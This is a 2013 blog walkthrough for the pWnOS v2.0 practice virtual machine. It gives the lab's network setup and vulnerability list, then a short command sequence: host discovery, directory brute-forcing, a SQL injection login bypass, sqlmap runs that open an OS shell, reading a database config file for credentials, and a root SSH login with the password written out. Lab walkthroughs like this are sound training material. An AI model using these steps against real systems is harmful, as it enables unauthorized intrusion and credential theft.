Penetration Test pWnOS v2.0 with Sqlmap

Posted by Security is just an illusion at Saturday, March 09, 2013 Read our previous post

 

 

 

pWnOS v2.0 (PRE-RELEASE!)

Goal:

• Get root... Win!

About:

pWnOS v2.0 is a Virutal Machine Image which hosts a server to pratice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was design to be used with WMWare Workstation 7.0, but can also be used with most other virtual machine software.

Configuration & Setup:

• Configure your attacking platform to be within the 10.10.10.0/24 network range

For example the ip of 10.10.10.200 with the netmask of 255.255.255.0 is what I statically set my BackTrack 5 network adapter to.

• VMWare's Network Adapter is set to Bridged Network Adapter

You may need to change VMWare's Network Adapter to NAT or Host-Only depending on your setup

The server's ip is staticaly set to 10.10.10.100

Server's Network Settings:

• IP: 10.10.10.100
• Netmask: 255.255.255.0
• Gateway: 10.10.10.15

Version History:

v2.0 - 07/04/2011 - Pre-Release copy for initial testing

Source: pWnOS_v2.0.7z/pWnOS v2.0/pWnOS_INFO-v2_0.txt

Vulnerabilities:

• Insecure File Handling
• Password In Plain Text
• Reused Credentials
• SQL Injection
• Unrestricted Upload of File with Dangerous Type

pWnOS_v2.0.7z (Size: 286 MB)

• Download: http://pwnos.com/files/pWnOS_v2.0.7z

 

//Commands
netdiscover -r 10.10.10.0/24
ifconfig eth0 10.10.10.13
rootme=10.10.10.100

cd /pentest/web/dirb
./dirb http://$rootme
firefox $rootme/login
'or 1=1-- - simple sqli

cd /pentest/database/sqlmap
python sqlmap.py --form --dbs --batch -u http://$rootme/login
python sqlmap.py --form --os-shell --batch -u http://$rootme/login

ls /
ls /var
cat /var/mysqli_connect.php

shh root@10.10.10.100
pw: root@ISIntS

id
uname -a
pwned ;)